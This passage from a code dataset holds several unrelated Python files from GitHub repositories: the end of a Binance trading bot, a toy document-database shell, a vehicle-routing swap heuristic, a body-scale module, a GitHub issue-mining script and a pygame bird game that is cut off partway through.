name='Buy Order'))\n fig.add_trace(go.Scatter(x=sell_orders.time, y=sell_orders.price_, mode='markers', name='Sell Order'))\n\n\ndef main():\n possible_values = [[1, 0], # single_sma(1,0)\n [1, 0], # single_ema\n # [1,0], # single_dmp\n # [-1,1,0], # double_dmp\n [-1, 1, 0], # single_rsi\n # [-1,1,0], # double_ema\n # [-1,1,0], # double_sma\n [0, 1] # is_bought\n ]\n action_space = [-1, 1, 0]\n # signal_column = ['single_sma','single_ema', 'single_dmp', 'double_dmp', 'single_rsi', 'double_ema', 'double_sma']\n signal_column = ['single_sma', 'single_ema', 'single_rsi']\n\n\n stop_loss = 1e-2\n take_profit = 3e-3\n multiplier = 1\n Target = \"BTC\"\n Base_Currency = \"USDT\"\n symbol = Target + Base_Currency\n # current_balance = {'TRX': get_cash('TRX'), 'USDT': get_cash('USDT')}\n current_balance = {Target: get_cash(Target), Base_Currency: get_cash(Base_Currency)}\n print(current_balance)\n\n\n run(symbol=symbol, asset_1=Target, asset_2=Base_Currency, stop_loss=stop_loss,\n take_profit=take_profit,multiplier=multiplier,env=env, is_load=is_load)\n\n\n\n # df = get_data('TRXUSDT', '1m', limit=1000)\n # fig = go.Figure()\n # # plot_order_stocks(df, 'TRXUSDT')\n # for i in range(10):\n # plot_order_stocks(df, 'TRXUSDT',fig)\n # time.sleep(2)\n # fig.show()\n\n\n\n\nif __name__ == '__main__':\n logging.basicConfig(filename='logs.log', format='%(filename)s: %(message)s',level=logging.INFO)\n # get_klines('TRXUSDT', '1m', '4 day ago UTC', 'now UTC')\n main()\n","repo_name":"UMEGS/trading_bot","sub_path":"BinanceBot/bot_functional.py","file_name":"bot_functional.py","file_ext":"py","file_size_in_byte":17579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"17181944073","text":"import os\nfrom accepted_formats import video_formats, extracted_data\n\n\npath = '/home/amit9021/AgadoDB/data'\n\n\nfor dirpath, dirnames, filenames in os.walk(path):\n for file in filenames:\n if not any(file.endswith(f\"{i}\") for i in video_formats) and not any(file.startswith(f\"{x}\") for x in extracted_data):\n print(file)\n","repo_name":"amit9021/datamanegment","sub_path":"datamangment/garbage_collector.py","file_name":"garbage_collector.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"23856737818","text":"\"\"\"\nThis file will handle hosting the command line tool.\n\"\"\"\nimport sys\nsys.path.append('./')\nsys.path.append('../')\n# sys.path.append('../../')\nfrom cmd import Cmd\nimport re\nimport os\nimport ast\nimport json\nfrom memory import DatabaseStorage\nfrom queries.queryhandler import QueryHandler\nfrom crud.insert import Insert\nfrom crud.update import Update\nfrom crud.delete import Delete\nfrom indexing.text_search import TextSearch\nfrom indexing.create_index import CreateIndex\nfrom interface.constants import *\nimport string\nclass CLI(Cmd):\n prompt = '> '\n intro = \"Welcome to DocsDB-I1! Type ? to list commands\"\n db = None\n database_location = None\n present_directory = None\n collections_list = []\n database_list = []\n \n def getDirectoryList(self, path):\n \"\"\"\n Get the list of database directories. This returns all directories \n having JSON files in the current folder. 
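Both bot_binance_signel and bot_binance_rl repeat the same exit condition across their normal and emergency sell branches. A refactoring sketch (not part of the bot) that isolates the rule as a pure function — a trailing stop measured from the running maximum since entry, plus a fixed take-profit measured from the entry price:

def should_exit(close: float, entry: float, peak: float,
                stop_loss: float, take_profit: float) -> bool:
    hit_stop = close < peak * (1.0 - stop_loss)       # trailing stop
    hit_profit = close > entry * (1.0 + take_profit)  # take profit
    return hit_stop or hit_profit

# e.g. entry=100, peak=110, stop_loss=0.01 -> exit once price < 108.9
print(should_exit(108.5, 100.0, 110.0, 0.01, 0.2))    # True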
Not the safest mechanism\n as artificial JSON files may also get pulled in, but we will leave \n it as is for now.\n \"\"\"\n directoryList = []\n\n #return nothing if path is a file\n if os.path.isfile(path):\n return []\n\n #add dir to directorylist if it contains .json files\n if len([f for f in os.listdir(path) if f.endswith('.bson') and 'indexes' not in path])>0:\n directoryList.append(path.split('./')[1])\n\n for d in os.listdir(path):\n new_path = os.path.join(path, d)\n if os.path.isdir(new_path):\n directoryList += self.getDirectoryList(new_path)\n\n return directoryList\n def get_databases(self):\n \"\"\"\n Returns the databases present in the current directory.\n \"\"\"\n self.present_directory = './'\n self.database_list = self.getDirectoryList(self.present_directory)\n\n def get_collections(self):\n \"\"\"\n Returns the collections present under the current directory.\n \"\"\"\n self.collections_list = []\n for path in os.listdir(self.database_location):\n self.collections_list.append(path.split('.')[0])\n\n def do_show(self, inp):\n \"\"\"\n Runs the show command. Inp can be either dbs or collections.\n If not, raise an exception\n \"\"\"\n if inp == DBS:\n for db in self.database_list:\n print(f\">>> {db}\")\n elif inp == COLLECTIONS and self.db != None:\n for collection in self.collections_list:\n print(f\">>> {collection}\")\n else:\n print('Invalid command')\n\n def do_use(self, inp):\n \"\"\"\n Changes the current database to the name provided\n \"\"\"\n if inp == '' or inp == None:\n print('Database Name invalid')\n \n self.db = DatabaseStorage(database_name=inp)\n self.database_location = f'./{inp}/'\n self.get_collections()\n self.db_name = inp\n\n print('switched to', inp)\n\n def do_exit(self, inp):\n '''exit the application.'''\n print(\"Bye\")\n return True\n \n def do_db(self, inp):\n '''\n This handles all other standard mongodb inputs\n '''\n self.parser(inp)\n\n\n def extract_sel_proj(self, inp):\n \"\"\"\n Performing paranthesis matching to find the last } matching the first {\n For now assuming [] and () will match on their own.\n \"\"\"\n if inp[0] != '{':\n return INV_SNTX, ''\n lc, rc = 1,0\n for i,c in enumerate(inp[1:]):\n if c == '{':\n lc += 1\n elif c == '}':\n rc += 1\n if rc == lc:\n # found the match\n r1 = inp[:i+2]\n r2 = inp[i+2:]\n r2 = r2[r2.find('{'):]\n return r1, r2\n\n def parser(self, inp):\n \"\"\"\n Parses the input. 
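getDirectoryList recurses by hand to find folders that directly contain data files. An equivalent discovery sketch (assumed) using os.walk, which avoids the manual recursion and the explicit isfile/isdir checks:

import os

def find_databases(root="./"):
    # Collect every directory that directly contains .bson files,
    # skipping index folders, mirroring the manual recursion above.
    found = []
    for dirpath, _dirs, files in os.walk(root):
        if "indexes" in dirpath:
            continue
        if any(f.endswith(".bson") for f in files):
            found.append(os.path.relpath(dirpath, root))
    return found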
For each new functionality added, the required class needs to \n be added to the parser.\n \"\"\"\n tokens = inp.split('.')\n if len(tokens) < 3 or tokens[1] not in self.collections_list:\n print('Invalid command')\n else:\n # In all other cases, process\n self.collection_name = tokens[1]\n self.db = DatabaseStorage(database_name=self.db_name, collection_name=self.collection_name)\n # Perform {} matching to extract the select and project parts.\n [oprn, *rest] = list(map(str.strip, re.split('\\(|\\)', tokens[2])))\n if oprn == FIND:\n sel, proj = self.extract_sel_proj(rest[0])\n q = QueryHandler()\n if sel == INV_SNTX:\n print(INV_SNTX)\n else:\n q.handle_query(oprn, [json.loads(sel), json.loads(proj)], self.db.storage)\n # CRUD operations only have 1 field {}\n elif oprn == INSERT_ONE:\n payload = json.loads(rest[0])\n ins = Insert()\n ins.insert_one(database=self.db_name, collection_name=self.collection_name, payload=payload)\n elif oprn == INSERT_MANY:\n payloads = json.loads(rest[0])\n ins = Insert()\n ins.insert_many(database=self.db_name, collection_name=self.collection_name, payloads=payloads)\n elif oprn == UPDATE_ONE:\n payload = json.loads(rest[0])\n up = Update()\n up.update_one(database=self.db_name, collection_name=self.collection_name, payload=payload)\n elif oprn == DELETE_ONE:\n payload = json.loads(rest[0])\n delete = Delete()\n delete.delete_one(database=self.db_name, collection_name=self.collection_name, payload=payload)\n elif oprn == SEARCH:\n # Just a single word\n payload = rest[0][1:-1]\n if type(payload)!= str:\n print(\"Requires a single word to search\")\n else:\n ts = TextSearch(database_name=self.db_name, collection_name=self.collection_name, word_to_search=payload)\n ts.search()\n elif oprn == C_INDX:\n # payload is a list of fields\n try:\n payload = ast.literal_eval(rest[0])\n index = CreateIndex(database_name=self.db_name, collection_name=self.collection_name, fields=payload)\n index.populate_index(SEARCH)\n except:\n print(\"Require a list of fields\")\n elif oprn == LOOKUP:\n lookup_str = rest[0]\n lookup_str.strip(\"()\")\n print(lookup_str)\n lookup_dict = json.loads(lookup_str)\n from_collection = lookup_dict['from']\n local_field = lookup_dict['localField']\n foreign_field = lookup_dict['foreignField']\n as_field = lookup_dict['as']\n type = lookup_dict['type']\n\n col2 = DatabaseStorage(database_name=self.db_name, collection_name=from_collection)\n col1 = DatabaseStorage(database_name=self.db_name, collection_name=self.collection_name)\n\n q = QueryHandler()\n q.handle_query('lookup', [col2.storage, local_field, foreign_field, as_field, type], col1.storage)\n elif oprn == GROUPBY:\n q = QueryHandler()\n groupby, proj = self.extract_sel_proj(rest[0])\n q.handle_query(oprn,[json.loads(groupby),json.loads(proj)], self.db.storage)\n \n # TODO: ADD NEW OPERATIONS HERE.\n\ncli = CLI()\ncli.get_databases()\ncli.cmdloop()\n","repo_name":"lordbeerus0505/DocDbImplementation","sub_path":"interface/cli_runner.py","file_name":"cli_runner.py","file_ext":"py","file_size_in_byte":7709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"13668844494","text":"import socket\n\nHOST = '127.0.0.1'\nPORT = 10000\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((HOST, PORT))\n\nwhile True:\n message = input('客户端:')\n s.sendall(message.encode())\n data = s.recv(4096)\n 
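A usage sketch of the brace matching above, written as a free function (assumed) so it can be tried outside the CLI: it splits the argument string of find({selector}, {projection}) at the brace that closes the first top-level object.

def split_sel_proj(inp: str):
    if not inp.startswith("{"):
        return None, None
    depth = 0
    for i, c in enumerate(inp):
        if c == "{":
            depth += 1
        elif c == "}":
            depth -= 1
            if depth == 0:                  # closed the first object
                rest = inp[i + 1:]
                return inp[:i + 1], rest[rest.find("{"):]
    return None, None

sel, proj = split_sel_proj('{"age": {"$gt": 21}}, {"name": 1}')
print(sel)    # {"age": {"$gt": 21}}
print(proj)   # {"name": 1}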
print('服务器:{}'.format(data.decode()))\ns.close()\n\n\n\n","repo_name":"no2key/hellopy","sub_path":"talk_server/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"30037599331","text":"from VRP_Model import *\nfrom VRPMinimumInsertions import *\nfrom SolutionDrawer import *\n\nclass Solution:\n def __init__(self): #sider\n self.max_cost_of_route = 0.0\n self.routes = []\n\nclass SwapMove(object):\n def __init__(self):\n self.positionOfFirstRoute = None\n self.positionOfSecondRoute = None\n self.positionOfFirstNode = None\n self.positionOfSecondNode = None\n self.costChangeFirstRt = None\n self.costChangeSecondRt = None\n self.moveCost = None\n\n def Initialize(self):\n self.positionOfFirstRoute = None\n self.positionOfSecondRoute = None\n self.positionOfFirstNode = None\n self.positionOfSecondNode = None\n self.costChangeFirstRt = None\n self.costChangeSecondRt = None\n self.moveCost = 10 ** 9\n\nclass Swaps:\n\n def __init__(self, minIns):\n # m is the model, siders_constant, siders_constant2 (the second is optional) are numbers that define how\n # important is it for an insertion not to increase the min_max cost of the solution\n self.allNodes = minIns.allNodes\n self.customers = minIns.customers\n self.depot = minIns.allNodes[0]\n self.time_matrix = minIns.time_matrix\n self.capacity = minIns.capacity\n self.sol = minIns.sol\n self.bestSolution = None\n\n def solveSwaps(self): # with sort variable defines if the minimum_insertions_with_opened_routes will\n # sort the self.customers\n self.LocalSearch(1)\n return self.sol\n\n def FindRouteWithMaxCost(self): # mo\n # function returning the route with the maximum cost and its index in the list of routes\n for i in range(len(self.sol.routes)):\n if self.sol.routes[i].cost == self.sol.max_cost_of_route:\n print(i)\n return (i,self.sol.routes[i])\n # return [(i,self.sol.routes[i]) if self.sol.routes[i].cost == self.sol.max_cost_of_route else None for i in range(len(self.sol.routes))]\n\n def CalculateMaxCostOfRoute(self): # sider\n # returns the max cost of the routes in the current solution\n # return max(\n # sum(\n # self.time_matrix[self.sol.routes[i].sequenceOfNodes[j].ID][self.sol.routes[i].sequenceOfNodes[j + 1].ID]\n # for j in range(len(self.sol.routes[i].sequenceOfNodes) - 1)\n # ) for i in range(len(self.sol.routes))\n # )\n return max(route.cost for route in self.sol.routes) # if the routes costs are correct this will work, else\n # try the commented piece of code\n\n def LocalSearch(self, operator):\n self.bestSolution = self.cloneSolution(self.sol)\n terminationCondition = False\n localSearchIterator = 0\n\n sm = SwapMove()\n\n while terminationCondition is False:\n\n self.InitializeOperators(sm)\n #SolDrawer.draw(localSearchIterator, self.sol, self.allNodes)\n\n # Swaps\n if operator == 1:\n self.FindBestSwapMove(sm)\n if sm.positionOfFirstRoute is not None:\n if sm.moveCost < 0:\n self.ApplySwapMove(sm)\n else:\n terminationCondition = True\n\n self.TestSolution()\n\n if (self.sol.max_cost_of_route < self.bestSolution.max_cost_of_route):\n self.bestSolution = self.cloneSolution(self.sol)\n\n localSearchIterator = localSearchIterator + 1\n\n self.sol = self.bestSolution\n print(localSearchIterator)\n\n def FindBestSwapMove(self, sm): # mo\n unpack = self.FindRouteWithMaxCost() # find the Route with the max cost and its index in the routes matrix\n firstRouteIndex = unpack[0] # unpack index\n rt1 = 
unpack[1] # unpack Route\n for secondRouteIndex in range(0, len(self.sol.routes)): # for every route that has not been checked for the first root\n rt2: Route = self.sol.routes[secondRouteIndex] # the route from which a node will be swapped\n for firstNodeIndex in range(1, len(rt1.sequenceOfNodes) - 1): # for every node of the first route\n startOfSecondNodeIndex = 1 # start index for the second route\n if rt1 == rt2: #if the routes are the same\n startOfSecondNodeIndex = firstNodeIndex + 1 # start one node forward to avoid checking the same ones\n for secondNodeIndex in range(startOfSecondNodeIndex, len(rt2.sequenceOfNodes) - 1): # for every node of the second route after the index we specified\n\n # nodes of the first route\n a1 = rt1.sequenceOfNodes[firstNodeIndex - 1]\n b1 = rt1.sequenceOfNodes[firstNodeIndex]\n c1 = rt1.sequenceOfNodes[firstNodeIndex + 1]\n\n # nodes of the second route\n a2 = rt2.sequenceOfNodes[secondNodeIndex - 1]\n b2 = rt2.sequenceOfNodes[secondNodeIndex]\n c2 = rt2.sequenceOfNodes[secondNodeIndex + 1]\n\n moveCost = None\n costChangeFirstRoute = None\n costChangeSecondRoute = None\n\n if rt1 == rt2: # if the routes are same\n if firstNodeIndex == secondNodeIndex - 1: # if the first node is behind the second node\n costRemoved = self.time_matrix[a1.ID][b1.ID] + self.time_matrix[b1.ID][b2.ID] + \\\n self.time_matrix[b2.ID][c2.ID]\n costAdded = self.time_matrix[a1.ID][b2.ID] + self.time_matrix[b2.ID][b1.ID] + \\\n self.time_matrix[b1.ID][c2.ID]\n moveCost = costAdded - costRemoved\n\n else:\n costRemoved1 = self.time_matrix[a1.ID][b1.ID] + self.time_matrix[b1.ID][c1.ID]\n costAdded1 = self.time_matrix[a1.ID][b2.ID] + self.time_matrix[b2.ID][c1.ID]\n costRemoved2 = self.time_matrix[a2.ID][b2.ID] + self.time_matrix[b2.ID][c2.ID]\n costAdded2 = self.time_matrix[a2.ID][b1.ID] + self.time_matrix[b1.ID][c2.ID]\n moveCost = costAdded1 + costAdded2 - (costRemoved1 + costRemoved2)\n else:\n if rt1.load - b1.demand + b2.demand > self.capacity:\n continue\n if rt2.load - b2.demand + b1.demand > self.capacity:\n continue\n\n costRemoved1 = self.time_matrix[a1.ID][b1.ID] + self.time_matrix[b1.ID][c1.ID]\n costAdded1 = self.time_matrix[a1.ID][b2.ID] + self.time_matrix[b2.ID][c1.ID]\n costRemoved2 = self.time_matrix[a2.ID][b2.ID] + self.time_matrix[b2.ID][c2.ID]\n costAdded2 = self.time_matrix[a2.ID][b1.ID] + self.time_matrix[b1.ID][c2.ID]\n\n costChangeFirstRoute = costAdded1 - costRemoved1\n costChangeSecondRoute = costAdded2 - costRemoved2\n if (rt1.cost + costChangeFirstRoute) > (rt2.cost + costChangeSecondRoute):\n moveCost = costChangeFirstRoute\n else:\n moveCost = rt2.cost + costChangeSecondRoute - self.sol.max_cost_of_route\n if moveCost < sm.moveCost and abs(moveCost) > 0.0001:\n self.StoreBestSwapMove(firstRouteIndex, secondRouteIndex, firstNodeIndex, secondNodeIndex,\n moveCost, costChangeFirstRoute, costChangeSecondRoute, sm)\n\n\n def ApplySwapMove(self, sm):\n rt1 = self.sol.routes[sm.positionOfFirstRoute]\n rt2 = self.sol.routes[sm.positionOfSecondRoute]\n b1 = rt1.sequenceOfNodes[sm.positionOfFirstNode]\n b2 = rt2.sequenceOfNodes[sm.positionOfSecondNode]\n rt1.sequenceOfNodes[sm.positionOfFirstNode] = b2\n rt2.sequenceOfNodes[sm.positionOfSecondNode] = b1\n\n if (rt1 == rt2):\n rt1.cost += sm.moveCost\n else:\n rt1.cost += sm.costChangeFirstRt\n rt2.cost += sm.costChangeSecondRt\n rt1.load = rt1.load - b1.demand + b2.demand\n rt2.load = rt2.load + b1.demand - b2.demand\n\n self.sol.max_cost_of_route = self.CalculateMaxCostOfRoute() # find the new max cost after 
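A numeric sanity check (a sketch) for the swap deltas computed in FindBestSwapMove: swapping two non-adjacent nodes b1 and b2 only changes the four arcs around them, so the recomputed route cost should differ from the original by exactly (added1 - removed1) + (added2 - removed2).

d = [[0, 4, 6, 3, 5],
     [4, 0, 5, 7, 8],
     [6, 5, 0, 2, 9],
     [3, 7, 2, 0, 1],
     [5, 8, 9, 1, 0]]                 # symmetric toy time matrix

def route_cost(seq):
    return sum(d[a][b] for a, b in zip(seq, seq[1:]))

before = [0, 1, 2, 3, 4, 0]           # depot ... depot
after = [0, 3, 2, 1, 4, 0]            # nodes 1 and 3 swapped
a1, b1, c1 = 0, 1, 2                  # neighbours of b1 in 'before'
a2, b2, c2 = 2, 3, 4                  # neighbours of b2 in 'before'
delta = (d[a1][b2] + d[b2][c1] - d[a1][b1] - d[b1][c1]) + \
        (d[a2][b1] + d[b1][c2] - d[a2][b2] - d[b2][c2])
print(route_cost(after) - route_cost(before) == delta)   # True (both are 6)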
the relocation\n self.TestSolution()\n\n\n def StoreBestSwapMove(self, firstRouteIndex, secondRouteIndex, firstNodeIndex, secondNodeIndex, moveCost,\n costChangeFirstRoute, costChangeSecondRoute, sm):\n sm.positionOfFirstRoute = firstRouteIndex\n sm.positionOfSecondRoute = secondRouteIndex\n sm.positionOfFirstNode = firstNodeIndex\n sm.positionOfSecondNode = secondNodeIndex\n sm.costChangeFirstRt = costChangeFirstRoute\n sm.costChangeSecondRt = costChangeSecondRoute\n sm.moveCost = moveCost\n\n def cloneRoute(self, rt: Route):\n cloned = Route(self.depot, self.capacity)\n cloned.cost = rt.cost\n cloned.load = rt.load\n cloned.sequenceOfNodes = rt.sequenceOfNodes.copy()\n return cloned\n\n def cloneSolution(self, sol: Solution):\n cloned = Solution()\n for i in range(0, len(sol.routes)):\n rt = sol.routes[i]\n clonedRoute = self.cloneRoute(rt)\n cloned.routes.append(clonedRoute)\n cloned.max_cost_of_route = self.sol.max_cost_of_route\n return cloned\n\n def InitializeOperators(self, sm):\n sm.Initialize()\n\n def TestSolution(self): # sider\n if len(self.sol.routes) > 25: # if the solution used more routes than the routes available\n print(\"Routes' number problem.\")\n max_cost_of_route = 0\n nodes_serviced = 0\n for r in range(0, len(self.sol.routes)):\n rt: Route = self.sol.routes[r]\n nodes_serviced += len(rt.sequenceOfNodes) - 2 # -2 because we remove depot that exist twice in every route\n rt_cost = 0\n rt_load = 0\n for n in range(0, len(rt.sequenceOfNodes) - 1):\n A = rt.sequenceOfNodes[n]\n B = rt.sequenceOfNodes[n + 1]\n rt_cost += self.time_matrix[A.ID][B.ID]\n rt_load += A.demand\n if abs(rt_cost - rt.cost) > 0.0001:\n print('Route Cost problem')\n if rt_load != rt.load:\n print('Route Load problem')\n if rt_cost > max_cost_of_route:\n max_cost_of_route = rt_cost\n if abs(max_cost_of_route - self.sol.max_cost_of_route) > 0.0001:\n print('Solution Cost problem, solution cost: ' + str(self.sol.max_cost_of_route) +\n ' calculated cost: ' + str(self.CalculateMaxCostOfRoute()))\n if nodes_serviced != len(self.customers):\n print('Number of serviced nodes problem')\n","repo_name":"Nikos-Antonopoulos/MEVEDE-COMPETITION","sub_path":"Swaps.py","file_name":"Swaps.py","file_ext":"py","file_size_in_byte":11071,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"69996038655","text":"\"\"\"Body scale module.\"\"\"\nfrom functools import cached_property\n\nfrom ..models import Gender\n\n\nclass Scale:\n \"\"\"Scale implementation.\"\"\"\n\n def __init__(self, height: int, gender: Gender):\n self._height = height\n self._gender = gender\n\n def get_fat_percentage(self, age: int) -> list[float]:\n \"\"\"Get fat percentage.\"\"\"\n\n # The included tables where quite strange, maybe bogus, replaced them with better ones...\n scales: list[dict] = [\n {\n \"min\": 0,\n \"max\": 12,\n Gender.FEMALE: [12.0, 21.0, 30.0, 34.0],\n Gender.MALE: [7.0, 16.0, 25.0, 30.0],\n },\n {\n \"min\": 12,\n \"max\": 14,\n Gender.FEMALE: [15.0, 24.0, 33.0, 37.0],\n Gender.MALE: [7.0, 16.0, 25.0, 30.0],\n },\n {\n \"min\": 14,\n \"max\": 16,\n Gender.FEMALE: [18.0, 27.0, 36.0, 40.0],\n Gender.MALE: [7.0, 16.0, 25.0, 30.0],\n },\n {\n \"min\": 16,\n \"max\": 18,\n Gender.FEMALE: [20.0, 28.0, 37.0, 41.0],\n Gender.MALE: [7.0, 16.0, 25.0, 30.0],\n },\n {\n \"min\": 18,\n \"max\": 40,\n Gender.FEMALE: [21.0, 28.0, 35.0, 40.0],\n Gender.MALE: [11.0, 17.0, 22.0, 27.0],\n },\n {\n \"min\": 40,\n \"max\": 60,\n Gender.FEMALE: [22.0, 29.0, 36.0, 41.0],\n Gender.MALE: 
[12.0, 18.0, 23.0, 28.0],\n },\n {\n \"min\": 60,\n \"max\": 100,\n Gender.FEMALE: [23.0, 30.0, 37.0, 42.0],\n Gender.MALE: [14.0, 20.0, 25.0, 30.0],\n },\n ]\n\n for scale in scales:\n if scale[\"min\"] <= age < scale[\"max\"]:\n return scale[self._gender] # type: ignore\n\n # will never happen but mypy required it\n raise NotImplementedError\n\n @cached_property\n def muscle_mass(self) -> list[float]:\n \"\"\"Get muscle mass.\"\"\"\n scales: list[dict] = [\n {\n \"min\": {Gender.MALE: 170, Gender.FEMALE: 160},\n Gender.FEMALE: [36.5, 42.6],\n Gender.MALE: [49.4, 59.5],\n },\n {\n \"min\": {Gender.MALE: 160, Gender.FEMALE: 150},\n Gender.FEMALE: [32.9, 37.6],\n Gender.MALE: [44.0, 52.5],\n },\n {\n \"min\": {Gender.MALE: 0, Gender.FEMALE: 0},\n Gender.FEMALE: [29.1, 34.8],\n Gender.MALE: [38.5, 46.6],\n },\n ]\n\n for scale in scales:\n if self._height >= scale[\"min\"][self._gender]:\n return scale[self._gender] # type: ignore\n\n # will never happen but mypy required it\n raise NotImplementedError\n","repo_name":"dckiller51/bodymiscale","sub_path":"custom_components/bodymiscale/metrics/scale.py","file_name":"scale.py","file_ext":"py","file_size_in_byte":2976,"program_lang":"python","lang":"en","doc_type":"code","stars":162,"dataset":"github-code","pt":"79"} +{"seq_id":"25458485028","text":"from config import *\nfrom datetime import datetime\nfrom github import Github\nfrom helper import _get_time, _mine_convers, _check_quota, _get_bots\nimport math\nimport statistics\nimport pandas as pd\n\nbots = _get_bots()\n\n\ndef _compare():\n global TOKEN_ID\n g = Github(TOKENS[TOKEN_ID])\n # only compare data from the last month\n last_month = _get_time(1)\n current = _get_time(0)\n\n num_active_authors = []\n num_issue_closed = []\n num_pr_closed = []\n avg_time_issue = []\n avg_time_pr = []\n\n for proj in COMP_PROJS:\n issues = []\n prs = []\n\n print(proj)\n try:\n repo = g.get_repo(proj)\n except:\n g, repo = _check_quota(g, repo)\n repo = g.get_repo(proj)\n\n # get issues/prs from the past half a year\n try:\n res = repo.get_issues(\n state=\"all\", \n since=_get_time(6),\n direction=\"desc\")\n except:\n [g, repo] = _check_quota(g, repo)\n res = repo.get_issues(\n state=\"all\", \n since=_get_time(6),\n direction=\"desc\")\n \n count = 0\n for ind in res:\n count += 1\n if count % 500 == 0:\n g, repo = _check_quota(g, repo)\n\n num = ind.number\n try:\n ind_res = repo.get_issue(number=num)\n except:\n g, repo = _check_quota(g, repo)\n ind_res = repo.get_issue(number=num)\n\n # if it's closed before the past month, we don't need to care about it\n # all left are the ones that are still open or closed within the past\n # month\n if (ind_res.closed_at != None and ind_res.closed_at < last_month):\n break\n\n if ind_res.closed_at != None: \n close_len = (ind_res.closed_at - ind_res.created_at).days\n open_for = close_len\n else:\n close_len = -1\n open_for = (datetime.today() - ind_res.created_at).days\n\n cur_dict = {\n \"number\":num,\n \"title\": ind_res.title,\n \"url\": ind_res.html_url,\n \"author\": ind_res.user,\n \"created_at\":ind_res.created_at,\n \"closed_at\":ind_res.closed_at,\n \"merged_at\": None,\n \"state\":ind_res.state,\n \"close_len\": close_len,\n \"open_for\": open_for,\n \"num_comments\":ind_res.comments,\n \"label\":[ind.name for ind in ind_res.labels]\n }\n\n # a pull request has a not none pull_request field\n g, repo = _check_quota(g, repo)\n if ind_res.pull_request != None:\n prs.append(cur_dict)\n else:\n issues.append(cur_dict)\n\n issues = pd.DataFrame(issues)\n 
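get_fat_percentage scans the age bands linearly with min <= age < max. An equivalent lookup sketch (an assumption) using bisect on the band upper edges; the rows here are the male thresholds from the table above:

import bisect

BOUNDS = [12, 14, 16, 18, 40, 60, 100]        # upper edge of each band
MALE_ROWS = [
    [7.0, 16.0, 25.0, 30.0],
    [7.0, 16.0, 25.0, 30.0],
    [7.0, 16.0, 25.0, 30.0],
    [7.0, 16.0, 25.0, 30.0],
    [11.0, 17.0, 22.0, 27.0],
    [12.0, 18.0, 23.0, 28.0],
    [14.0, 20.0, 25.0, 30.0],
]

def male_fat_thresholds(age: int):
    # bisect_right reproduces the half-open [min, max) band semantics;
    # age >= 100 raises IndexError, as the original raises for it.
    return MALE_ROWS[bisect.bisect_right(BOUNDS, age)]

print(male_fat_thresholds(45))                # [12.0, 18.0, 23.0, 28.0]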
prs = pd.DataFrame(prs)\n # num active authors\n non_bot_authors_i = [author for author in issues[\"author\"].tolist() if author not in bots]\n non_bot_authors_p = [author for author in prs[\"author\"].tolist() if author not in bots]\n num_active_authors.append(len(list(set(non_bot_authors_i).union(set(non_bot_authors_p)))))\n \n # num issue closed\n cur_win_closed_i = issues.loc[\n (issues[\"state\"]!=\"open\") &\n (issues[\"closed_at\"]>=last_month) &\n (issues[\"closed_at\"]=last_month) &\n (prs[\"closed_at\"]= 550:\n man_hinh.blit(be_mat_ong_tao_ra,pipe)\n else:\n flip_pipe = pygame.transform.flip(be_mat_ong_tao_ra,False,True) \n #Làm cho ống nó lật ngược lại\n man_hinh.blit(flip_pipe,pipe)\n#Hàm xử lý va chạm\ndef kiem_tra_va_cham(pipes):\n for pipe in pipes :\n if doi_hinh_chu_nhat.colliderect(pipe):\n am_thanh_va_cham.play()\n return False\n if doi_hinh_chu_nhat.top < 30 or doi_hinh_chu_nhat.bottom >= 810:\n return False\n return True\n\ndef xoay_doi_tuong(bat1):\n new_bat = pygame.transform.rotozoom(bat1,di_chuyen_cua_doi*2,1)\n return new_bat\n#hàm xử lý khi đang bay hình ảnh chú chim \ndef hoat_anh_cua_doi():\n new_bat = danh_sach_doi[gia_tri_cua_doi]\n new_doi_hinh_chu_nhat = new_bat.get_rect(center = (100, doi_hinh_chu_nhat.centery))\n return new_doi_hinh_chu_nhat\n#Hàm in điểm ra màn hình\ndef hien_thi_diem(game_state):\n if game_state == 'main game':\n diem_surface = font_chu_cua_tro_choi.render(str(int(diem)),True,(110,255,250))\n diem_rect = diem_surface.get_rect(center = (216,100))\n man_hinh.blit(diem_surface,diem_rect)\n if game_state == 'game_over':\n diem_surface = font_chu_cua_tro_choi.render(f'Score: {int(diem)}',True,(110,255,250))\n diem_rect = diem_surface.get_rect(center = (216,100))\n man_hinh.blit(diem_surface,diem_rect)\n\n diem_cao_surface = font_chu_cua_tro_choi.render(f'High Score: {int(diem_cao)}',True, (255,255,255))\n diem_cao_rect = diem_cao_surface.get_rect(center = (216,630))\n man_hinh.blit(diem_cao_surface,diem_cao_rect)\n#hàm cập nhật điểm\ndef cap_nhat_diem_hien_tai(diem,diem_cao):\n if diem > diem_cao:\n diem_cao = diem\n return diem_cao \n\n#Đây là phần xư lý âm thanh cho các file .wav\npygame.mixer.pre_init(frequency=44100,size=16,channels=2,buffer=512)\n\npygame.init()\npygame.display.set_caption(\"Flappy bat\")\nman_hinh = pygame.display.set_mode((432,810))\nclock = pygame.time.Clock()\nfont_chu_cua_tro_choi = pygame.font.Font(\"04B_19.ttf\",45)\n\n\n# Biến\ndo_roi = 0.7 #Độ rơi\ndi_chuyen_cua_doi = -10 #\nhoat_dong_cua_tro_choi = True \ndiem = 0 #Điểm\ndiem_cao = 0 #Điểm cao\n#chèn hinh_nen_game\nhinh_nen_game = pygame.image.load(\"assets/background-cyperpunk.png\").convert()\nhinh_nen_game = pygame.transform.scale2x(hinh_nen_game)\n#chèn sàn\nsan = pygame.image.load(\"assets/floor.png\").convert()\nsan = pygame.transform.scale2x(san)\nsan_x_pos = 0 \n#Tạo chim\ndoi_xuong = pygame.transform.scale2x(pygame.image.load(\"assets/bat2.png\")).convert_alpha()\ndoi_can_bang = pygame.transform.scale2x(pygame.image.load(\"assets/bat2.png\")).convert_alpha()\ndoi_len= pygame.transform.scale2x(pygame.image.load(\"assets/bat2.png\")).convert_alpha()\n# bat = pygame.transform.scale2x(pygame.image.load(\"assets/sea_horse.png\")).convert_alpha\ndanh_sach_doi = [doi_xuong,doi_can_bang,doi_len] \ngia_tri_cua_doi 